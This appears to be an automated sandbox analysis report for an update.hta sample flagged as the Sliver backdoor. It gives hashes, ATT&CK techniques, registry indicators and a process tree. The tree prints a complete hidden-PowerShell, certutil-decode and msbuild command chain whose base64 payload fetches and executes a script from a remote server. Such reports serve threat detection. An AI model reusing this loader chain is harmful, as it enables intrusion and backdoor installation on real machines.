sliver | 3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06-11-2024 08:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

update.hta
Size

3KB
MD5

f46e78d3864aae68f2b8e83af27b9cf3
SHA1

51d75c93a4d06327f172d41c797ecc99a8ba309a
SHA256

3a4befeda808fff4c4bef7d488d59fefa1334d9c7acb6cb155c6cfa9f88a03f3
SHA512

e714e39827ebe83e3c5e31bbd780d2909318a1bfaf2017476ee137b87ddf417ef0d0f933844c3140c2f276601658ad81e51718eb01286641504cdc0fb9d9662c

Score

10^/10

sliver backdoor defense_evasion discovery execution trojan

Malware Config

Signatures

Sliver RAT v2 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5004-94-0x00000138F1E40000-0x00000138F28BB000-memory.dmp	SliverRAT_v2
behavioral2/memory/5004-95-0x00000138F3340000-0x00000138F3E24000-memory.dmp	SliverRAT_v2
behavioral2/memory/5004-96-0x00000138F3340000-0x00000138F3E24000-memory.dmp	SliverRAT_v2
behavioral2/memory/5004-97-0x00000138F3340000-0x00000138F3E24000-memory.dmp	SliverRAT_v2
behavioral2/memory/5004-98-0x00000138F3340000-0x00000138F3E24000-memory.dmp	SliverRAT_v2
behavioral2/memory/5004-100-0x00000138F3340000-0x00000138F3E24000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

1568 powershell.exe

pid	process
1568	powershell.exe

Manipulates Digital Signatures 1 TTPs 3 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

Processes:

certutil.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL"	certutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION"	certutil.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION"	certutil.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation mshta.exe
Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs
Payload decoded via CertUtil.
defense_evasion

Deobfuscate/Decode Files or Information
T1140

Processes:

certutil.exe

pid process

4724 certutil.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	mshta.exe

pid	process
4724	certutil.exe

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

mshta.exepowershell.execertutil.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exemsbuild.exe

pid process

1568 powershell.exe
1568 powershell.exe
5004 msbuild.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exemsbuild.exe

description pid process

Token: SeDebugPrivilege 1568 powershell.exe
Token: SeDebugPrivilege 5004 msbuild.exe

pid	process
1568	powershell.exe
1568	powershell.exe
5004	msbuild.exe

description	pid	process
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	5004	msbuild.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

mshta.exepowershell.exemsbuild.execsc.execsc.execsc.exe

description	pid	process	target process
PID 1584 wrote to memory of 1568	1584	mshta.exe	powershell.exe
PID 1584 wrote to memory of 1568	1584	mshta.exe	powershell.exe
PID 1584 wrote to memory of 1568	1584	mshta.exe	powershell.exe
PID 1568 wrote to memory of 4724	1568	powershell.exe	certutil.exe
PID 1568 wrote to memory of 4724	1568	powershell.exe	certutil.exe
PID 1568 wrote to memory of 4724	1568	powershell.exe	certutil.exe
PID 1568 wrote to memory of 5004	1568	powershell.exe	msbuild.exe
PID 1568 wrote to memory of 5004	1568	powershell.exe	msbuild.exe
PID 5004 wrote to memory of 2192	5004	msbuild.exe	csc.exe
PID 5004 wrote to memory of 2192	5004	msbuild.exe	csc.exe
PID 2192 wrote to memory of 4448	2192	csc.exe	cvtres.exe
PID 2192 wrote to memory of 4448	2192	csc.exe	cvtres.exe
PID 5004 wrote to memory of 2336	5004	msbuild.exe	csc.exe
PID 5004 wrote to memory of 2336	5004	msbuild.exe	csc.exe
PID 2336 wrote to memory of 3540	2336	csc.exe	cvtres.exe
PID 2336 wrote to memory of 3540	2336	csc.exe	cvtres.exe
PID 5004 wrote to memory of 1908	5004	msbuild.exe	csc.exe
PID 5004 wrote to memory of 1908	5004	msbuild.exe	csc.exe
PID 1908 wrote to memory of 3784	1908	csc.exe	cvtres.exe
PID 1908 wrote to memory of 3784	1908	csc.exe	cvtres.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\update.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1584
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden echo PFByb2plY3QgVG9vbHNWZXJzaW9uPSI0LjAiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL2RldmVsb3Blci9tc2J1aWxkLzIwMDMiPg0KICA8IS0tIFRoaXMgaW5saW5lIHRhc2sgZXhlY3V0ZXMgYyMgY29kZS4gLS0+DQogIDwhLS0gQzpcV2luZG93c1xNaWNyb3NvZnQuTkVUXEZyYW1ld29yazY0XHY0LjAuMzAzMTlcbXNidWlsZC5leGUgcHNoZWxsLnhtbCAtLT4NCiAgIDwhLS0gQXV0aG9yOiBDYXNleSBTbWl0aCwgVHdpdHRlcjogQHN1YlRlZSAtLT4NCiAgPCEtLSBMaWNlbnNlOiBCU0QgMy1DbGF1c2UgLS0+DQogIDxUYXJnZXQgTmFtZT0iSGVsbG8iPg0KICAgPEZyYWdtZW50RXhhbXBsZSAvPg0KICAgPENsYXNzRXhhbXBsZSAvPg0KICA8L1RhcmdldD4NCiAgPFVzaW5nVGFzaw0KICAgIFRhc2tOYW1lPSJGcmFnbWVudEV4YW1wbGUiDQogICAgVGFza0ZhY3Rvcnk9IkNvZGVUYXNrRmFjdG9yeSINCiAgICBBc3NlbWJseUZpbGU9IkM6XFdpbmRvd3NcTWljcm9zb2Z0Lk5ldFxGcmFtZXdvcmtcdjQuMC4zMDMxOVxNaWNyb3NvZnQuQnVpbGQuVGFza3MudjQuMC5kbGwiID4NCiAgICA8UGFyYW1ldGVyR3JvdXAvPg0KICAgIDxUYXNrPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtIiAvPg0KICAgICAgPFVzaW5nIE5hbWVzcGFjZT0iU3lzdGVtLklPIiAvPg0KICAgICAgPENvZGUgVHlwZT0iRnJhZ21lbnQiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICAgICAgICAgIENvbnNvbGUuV3JpdGVMaW5lKCJIZWxsbyBGcm9tIEZyYWdtZW50Iik7DQogICAgICAgIF1dPg0KICAgICAgPC9Db2RlPg0KICAgIDwvVGFzaz4NCiAgICA8L1VzaW5nVGFzaz4NCiAgICA8VXNpbmdUYXNrDQogICAgVGFza05hbWU9IkNsYXNzRXhhbXBsZSINCiAgICBUYXNrRmFjdG9yeT0iQ29kZVRhc2tGYWN0b3J5Ig0KICAgIEFzc2VtYmx5RmlsZT0iQzpcV2luZG93c1xNaWNyb3NvZnQuTmV0XEZyYW1ld29ya1x2NC4wLjMwMzE5XE1pY3Jvc29mdC5CdWlsZC5UYXNrcy52NC4wLmRsbCIgPg0KICAgIDxUYXNrPg0KICAgICAgPFJlZmVyZW5jZSBJbmNsdWRlPSJTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uIiAvPg0KICAgICAgPENvZGUgVHlwZT0iQ2xhc3MiIExhbmd1YWdlPSJjcyI+DQogICAgICAgIDwhW0NEQVRBWw0KICAgICAgICANCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbTsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5JTzsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5EaWFnbm9zdGljczsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzOw0KICAgICAgICAgICAgLy9BZGQgRm9yIFBvd2VyU2hlbGwgSW52b2NhdGlvbg0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLkNvbGxlY3Rpb25zLk9iamVjdE1vZGVsOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbjsNCiAgICAgICAgICAgIHVzaW5nIFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUnVuc3BhY2VzOw0KICAgICAgICAgICAgdXNpbmcgU3lzdGVtLlRleHQ7DQogICAgICAgICAgICB1c2luZyBNaWNyb3NvZnQuQnVpbGQuRnJhbWV3b3JrOw0KICAgICAgICAgICAgdXNpbmcgTWljcm9zb2Z0LkJ1aWxkLlV0aWxpdGllczsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIHB1YmxpYyBjbGFzcyBDbGFzc0V4YW1wbGUgOiAgVGFzaywgSVRhc2sNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICBwdWJsaWMgb3ZlcnJpZGUgYm9vbCBFeGVjdXRlKCkNCiAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgIFN0cmluZyBjbWQgPSBAIihOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vc2VjdXJlLmNsb3VkdGVjaG5vbG9naWVzdXNhLmNvbTo4MDgxL3VwZGF0ZS50eHQnKSB8IGlleCI7DQogICAgICAgICAgICBSdW5zcGFjZSBycyA9IFJ1bnNwYWNlRmFjdG9yeS5DcmVhdGVSdW5zcGFjZSgpOw0KICAgICAgICAgICAgcnMuT3BlbigpOw0KICAgICAgICAgICAgUG93ZXJTaGVsbCBwcyA9IFBvd2VyU2hlbGwuQ3JlYXRlKCk7DQogICAgICAgICAgICBwcy5SdW5zcGFjZSA9IHJzOw0KICAgICAgICAgICAgcHMuQWRkU2NyaXB0KGNtZCk7DQogICAgICAgICAgICBwcy5JbnZva2UoKTsNCiAgICAgICAgICAgIHJzLkNsb3NlKCk7DQogICAgICAgICAgICByZXR1cm4gdHJ1ZTsNCiAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgDQogICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfQ0KICAgICAgICAgICAgDQogICAgICAgICAgICANCiANCiAgICAgICAgICAgIA0KICAgICAgICBdXT4NCiAgICAgIDwvQ29kZT4NCiAgICA8L1Rhc2s+DQogIDwvVXNpbmdUYXNrPg0KPC9Qcm9qZWN0Pg== > c:\windows\temp\enc3.txt;certutil -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe C:\windows\temp\d.xml
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1568
- - C:\Windows\SysWOW64\certutil.exe
    "C:\Windows\system32\certutil.exe" -decode c:\windows\temp\enc3.txt c:\windows\temp\d.xml
    3⤵
    - Manipulates Digital Signatures
    - Deobfuscate/Decode Files or Information
    - System Location Discovery: System Language Discovery
    PID:4724
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe" C:\windows\temp\d.xml
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5004
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k41viqvz\k41viqvz.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2192
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA73C.tmp" "c:\Users\Admin\AppData\Local\Temp\k41viqvz\CSCB5A2D0967FE546588AB6E89D2B4BDEAA.TMP"
        5⤵
        
        PID:4448
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qvy3vsc2\qvy3vsc2.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2336
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7E8.tmp" "c:\Users\Admin\AppData\Local\Temp\qvy3vsc2\CSC5936C64FBDD0488C9291D0ADFC2283D5.TMP"
        5⤵
        
        PID:3540
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pkvrgghy\pkvrgghy.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1908
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAA59.tmp" "c:\Users\Admin\AppData\Local\Temp\pkvrgghy\CSC18F93E6B45DD4686B7B8B2EB85A042C8.TMP"
        5⤵
        
        PID:3784

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

Subvert Trust Controls

T1553

SIP and Trust Provider Hijacking

T1553.003

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESA73C.tmp

Filesize
1KB

MD5
2e69493f12a4d8a42caef2d3980a5885

SHA1
d2cb1413ad09a3fa76f4de90fa7c407fc5d90298

SHA256
1a4f34d2b28775a15d5ca33422b1621cd75da3f7740bfd9b5735617acf36411e

SHA512
b15d9f97c19bb9ac26ede09e273296d52d9edd8bab4666793d2d916ff5c0e53c81cb93a8b29eb6d66e196caa08d33ccb1e591bcb7f5172d72b1fcfcdc705d015

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA7E8.tmp

Filesize
1KB

MD5
bdd5afd40a17355cf62ae16802cb6fdd

SHA1
02b4fcc091d703039e5255f87b1dd9edb608c020

SHA256
bd984f59b6e15312247f89368a44846d558ec0c4cbc1c9bcef280acd886db4e0

SHA512
25c70a360531332f271ad0f26da30b879a192032a26d07a6d15ff06225d47f2275de83775debb4c85a415ef3dcb1da9edb21706d528909e36828d78e88ddc301

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESAA59.tmp

Filesize
1KB

MD5
6165cba9e8626d44259701a14ada27f0

SHA1
afb5d03c75969ac677c5e0484006f7086143c2f9

SHA256
4bd265d32a6189745e845f4e494553fba8024bdaeff9587de8784afe77a22fbb

SHA512
aa3eb50ae9ec4764bdadd7918bd75334e1285e44c48fb7d8061b5a27ab78fdd0b57d2395940c7d759db688bf19494fd3dc1e25ea2b6727bad3a8b61cd11c9166

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_avknkpvs.gqv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\k41viqvz\k41viqvz.dll

Filesize
4KB

MD5
751ee3ffe7a6746b674f035fb4f4a0df

SHA1
0598ce3ff4b4f143897d2dd26756e92e43993695

SHA256
46cb551568df18ffb8fa5c7bc8649a512acddfadd15f06922b6315a9fa9a9788

SHA512
e0e92bdb2aa8bdeea5a483b197737661f26dc284fb858fbe193add1c6cd4018664302d2e64a0356fe9eded30e1b39060b7829290e368c05bb147fcbe86cabb03

Download Submit
C:\Users\Admin\AppData\Local\Temp\k41viqvz\k41viqvz.pdb

Filesize
11KB

MD5
ec7ed703c1ef205d261aa0d4ff18e508

SHA1
8c9b3e2244a69b52738a5b624797788d486b47f2

SHA256
58f5c451ff46d8626af08019cf30192d15984e45f3735f724d3dcee7b2ba33f1

SHA512
c195c69086a29e1a1d1b86f62cf8f8f2706390120421ce5a995a502a22546b539ac45670f4020d11a5dc0626df421b551f167b843eab7ae2a41375585c7b7b4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkvrgghy\pkvrgghy.dll

Filesize
3KB

MD5
9141d4831fcb813591ffe0a38597d9af

SHA1
617bac17a42cf24d77796016815d659c384168aa

SHA256
68d905f401a81e6c950c787a53c94ec59aaa0c8b260cdae497582abd1cc3ad13

SHA512
70dff971a0ccedfd7bfcf570b6cc98b0b5f7c734279a9cd0bc0cb9255da42b21b1a9b7ae603f720bf2d29122606236a06c6c6bd6adba4496473f9514fc67c465

Download Submit
C:\Users\Admin\AppData\Local\Temp\qvy3vsc2\qvy3vsc2.dll

Filesize
4KB

MD5
7e13ba19f5b69166916380a91b11b37f

SHA1
54509101a23b76ecffb066069b74b5d2312c2e72

SHA256
475e20cf4cdb4ba6cad09325de616bc36f57155479b3015c0021c50f8a8c7f42

SHA512
3f073e79d0badcacc9623fedd54e4a9ad4faa70318be0dae8a33c33c11d35fb617c71b4244a8fd3d8c65d5be0cf84233068dc34db9c13c8cd937d349170b3fbd

Download Submit
C:\Users\Admin\AppData\Local\Temp\qvy3vsc2\qvy3vsc2.pdb

Filesize
11KB

MD5
309963174bf559ac88258123d7011e6c

SHA1
4cfb1eb4b9f40ec2693e92eaff0140bb217bdc4f

SHA256
84cbd5533d9320d2e9e615e3da6bb1f2c080e261f26995e7933d277de7b092f7

SHA512
92742cf569d50eb2e124385314d8eeb537d263a8eeaca1ae63326e1ff95a115df56727f1c323c8c539ca7ad7d1dc1b845694f8ee526f64ac87e8b26bb87913b4

Download Submit
C:\windows\temp\d.xml

Filesize
2KB

MD5
6c2a8d820d8d80182aacdc125399cd71

SHA1
51ccd1e0c3247bf24da813a1f660a367f8deefc8

SHA256
104291eb54874a1e80375b91ec552efac6632272654c8a5613730bd2eba9e78a

SHA512
c7c825a9b237850f6d087a449baaeed4e671db91b3db078586e322e992cb26efdb24d0ff8b365291ff58c3786dc563a62c4cbdcb81cecd95027606ef6fffd8c3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\k41viqvz\CSCB5A2D0967FE546588AB6E89D2B4BDEAA.TMP

Filesize
652B

MD5
8de126f088d15dceddc3d86eb676c1a7

SHA1
f749d6c97417900dabaece08c635dfcd29382def

SHA256
b206081bbc7deacf09ee94d7cf67b6bf222dcee756143eace783a630fa07e084

SHA512
7ec535134f6da4f971de5791443ed455cc03f41b74b0a95936e23de2e29ff5e13756f43c4588ab0e52da30f59b820c69339339b8aa81b23295b8836f6e13238c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\k41viqvz\k41viqvz.0.cs

Filesize
1KB

MD5
4a4ff4a5e71cabe4864c862a697c1e27

SHA1
b95fb7438213c3ae9caf0e8b52bb301fefcddb56

SHA256
70e3eb02311312b3f1ff90617cb47ebb9b8e7cab47771668811a34584182c6bb

SHA512
7c9257e5f23e2c378f47cb3bdced440d07bf96575a10883e59e0a0b4d8834b0ab3a43e4b850f48e2538021d2b352d732fc93f81277bcc20c45b070dc56bdcff5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\k41viqvz\k41viqvz.cmdline

Filesize
660B

MD5
03220ae2b6d99752381f94b1986a2998

SHA1
329bbe439c10eebedce00b27788a66d2acd1d78c

SHA256
e460294d3b2de342e6505c09c86461bfa6795c9d3a917239939127e8a4788ccf

SHA512
0809429373e0dd387fca17b79cd5990d6b85261d1996485884205f6100f0f50a8488ba6e1c0a4d3ef5f7f88649a8b6428a6af9a8b94dbc47b26c6f7dfd0be949

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pkvrgghy\CSC18F93E6B45DD4686B7B8B2EB85A042C8.TMP

Filesize
652B

MD5
c365f7a5b096924333426e28c87a2414

SHA1
d5f20fa246ad379d0158f6c6d559e5c082e8b82b

SHA256
01a5bb35f067190a895cd380586294d74505ac22c9787bb61aa95dd113724821

SHA512
8a0f3cb9593f9ca6f15289aa87d8c938e3f556e06069ef7bbbe539e32e22bdcce2cd1033889c34f0aec9e61fbbc47617b65334043e45daa9e013ffb94630d9a5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pkvrgghy\pkvrgghy.0.cs

Filesize
611B

MD5
9dc0e32c32d7b3cfd2f819d8c0e4c7a5

SHA1
267cb8f96e02e298033786efd8ee6d87a73418a3

SHA256
67bc3e11493360528ba1296980ab818bf4c3938d14ddd6b5063bba03667b28ac

SHA512
c41e6c862933bed65c892b6cc89765a63ae936bdcb7a0499e0b1bd57d2a1d710dd66acb58fa7a7ffbef8a339fe647ccae85f6fdac3e7e7657472576a979a14b0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\pkvrgghy\pkvrgghy.cmdline

Filesize
369B

MD5
c9a5ce0398b792f668c1ff9daee57b6e

SHA1
08f874c2b636d15844057837c60df7facf3b6c98

SHA256
4e3a480b96d9fa95726e87114091218351f1724ae1a428177431ce1d34d1fc49

SHA512
0a0de207d6343648fc5c6a1befdbe8f3afb38334e9ff56f4c0b714d629f97c334405463d6cf24ba2d8ba33f440a4f042bed8138ebc34b40a2deb41e728ead148

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qvy3vsc2\CSC5936C64FBDD0488C9291D0ADFC2283D5.TMP

Filesize
652B

MD5
c9511f5ea025642425dc3c524d03122a

SHA1
ef5f655c7dca4199c418f6348a5814d59c04beac

SHA256
6216aa9222171fd615c6a02c728913e66fde40768b0767c655cd4eacf9ee309f

SHA512
c2de58e6e66a5f715ec5e66ed5e4909a213b4f2a7cb1d044ff5b58be9ca0fc9bec6aa6abf348a990d98e550cb7d0259eb1c7f538c9b5c033654fdccbd22f88a4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qvy3vsc2\qvy3vsc2.0.cs

Filesize
1KB

MD5
da1f4b7b1a87cc475dfa05923b6301a0

SHA1
0e2ff764c519bc8169b66437857f01e25676e343

SHA256
624fe16b05ade5d9929c6ecf16857939230ea32156405c18b4dacfb0448e310e

SHA512
d09603fd0e641122cc99ccf6c53bb93db7df2b52ed1cdd44d3e73d963a3e9fd12eb1918477c043ba39e2ae123071f2df98b9180eb2a533c01bbdbaab2563b53b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qvy3vsc2\qvy3vsc2.cmdline

Filesize
801B

MD5
f98212b875d54dd71919c7932c8d4279

SHA1
d34c575515f833d3ad0391eaf75e73a8d0a49d4b

SHA256
666b282a93340b05f6bf3f7cf8db2dedfefc4ca8ef9344a39b68c83b7bae965a

SHA512
b07e649ddda7ba2e549bea639c5a203c70bbc37640d88c1ceeeefad31953ea6ab8d9c4c87569f9fd07f940abb121dd3d9c8e92b214af4574eeaf692dd1654c6a

Download Submit
\??\c:\windows\temp\enc3.txt

Filesize
6KB

MD5
940ed0fa0b1fc8ed6fbf279ab67af56f

SHA1
da4b7c40029542659f025ae74fa0be0fb0fa473c

SHA256
731673720695df22b838e0d256f7506eaa4c7570601db0a409302ab3a0cd1686

SHA512
934e3c5ee3b225ab0d686310a435865880b6c59f4885bb93cca814e8354456de3231364d3aa5cb6bc3c4472e6e6539da719c2b214e998e9e5773cca02f7d14ae

Download Submit
memory/1568-9-0x00000000060E0000-0x0000000006146000-memory.dmp

Filesize
408KB

Download
memory/1568-92-0x0000000073CCE000-0x0000000073CCF000-memory.dmp

Filesize
4KB

Download
memory/1568-93-0x0000000073CC0000-0x0000000074470000-memory.dmp

Filesize
7.7MB

Download
memory/1568-3-0x0000000003290000-0x00000000032C6000-memory.dmp

Filesize
216KB

Download
memory/1568-4-0x0000000005A40000-0x0000000006068000-memory.dmp

Filesize
6.2MB

Download
memory/1568-23-0x0000000006C20000-0x0000000006C3A000-memory.dmp

Filesize
104KB

Download
memory/1568-22-0x0000000007F70000-0x00000000085EA000-memory.dmp

Filesize
6.5MB

Download
memory/1568-21-0x0000000006760000-0x00000000067AC000-memory.dmp

Filesize
304KB

Download
memory/1568-20-0x0000000006720000-0x000000000673E000-memory.dmp

Filesize
120KB

Download
memory/1568-19-0x0000000006150000-0x00000000064A4000-memory.dmp

Filesize
3.3MB

Download
memory/1568-5-0x0000000073CC0000-0x0000000074470000-memory.dmp

Filesize
7.7MB

Download
memory/1568-6-0x0000000073CC0000-0x0000000074470000-memory.dmp

Filesize
7.7MB

Download
memory/1568-2-0x0000000073CCE000-0x0000000073CCF000-memory.dmp

Filesize
4KB

Download
memory/1568-7-0x0000000005780000-0x00000000057A2000-memory.dmp

Filesize
136KB

Download
memory/1568-8-0x0000000006070000-0x00000000060D6000-memory.dmp

Filesize
408KB

Download
memory/5004-35-0x00000138F1170000-0x00000138F14D6000-memory.dmp

Filesize
3.4MB

Download
memory/5004-66-0x00000138EFF40000-0x00000138EFF48000-memory.dmp

Filesize
32KB

Download
memory/5004-90-0x00000138F0080000-0x00000138F0088000-memory.dmp

Filesize
32KB

Download
memory/5004-33-0x00000138F0AC0000-0x00000138F0B04000-memory.dmp

Filesize
272KB

Download
memory/5004-30-0x00000138F0760000-0x00000138F0790000-memory.dmp

Filesize
192KB

Download
memory/5004-27-0x00000138EE2F0000-0x00000138EE32E000-memory.dmp

Filesize
248KB

Download
memory/5004-50-0x00000138EFF30000-0x00000138EFF38000-memory.dmp

Filesize
32KB

Download
memory/5004-32-0x00000138F0BA0000-0x00000138F0CC2000-memory.dmp

Filesize
1.1MB

Download
memory/5004-100-0x00000138F3340000-0x00000138F3E24000-memory.dmp

Filesize
10.9MB

Download
memory/5004-29-0x00000138F08C0000-0x00000138F0A1A000-memory.dmp

Filesize
1.4MB

Download
memory/5004-77-0x00000138F1E10000-0x00000138F1E32000-memory.dmp

Filesize
136KB

Download
memory/5004-34-0x00000138F0E00000-0x00000138F0F7C000-memory.dmp

Filesize
1.5MB

Download
memory/5004-94-0x00000138F1E40000-0x00000138F28BB000-memory.dmp

Filesize
10.5MB

Download
memory/5004-95-0x00000138F3340000-0x00000138F3E24000-memory.dmp

Filesize
10.9MB

Download
memory/5004-96-0x00000138F3340000-0x00000138F3E24000-memory.dmp

Filesize
10.9MB

Download
memory/5004-97-0x00000138F3340000-0x00000138F3E24000-memory.dmp

Filesize
10.9MB

Download
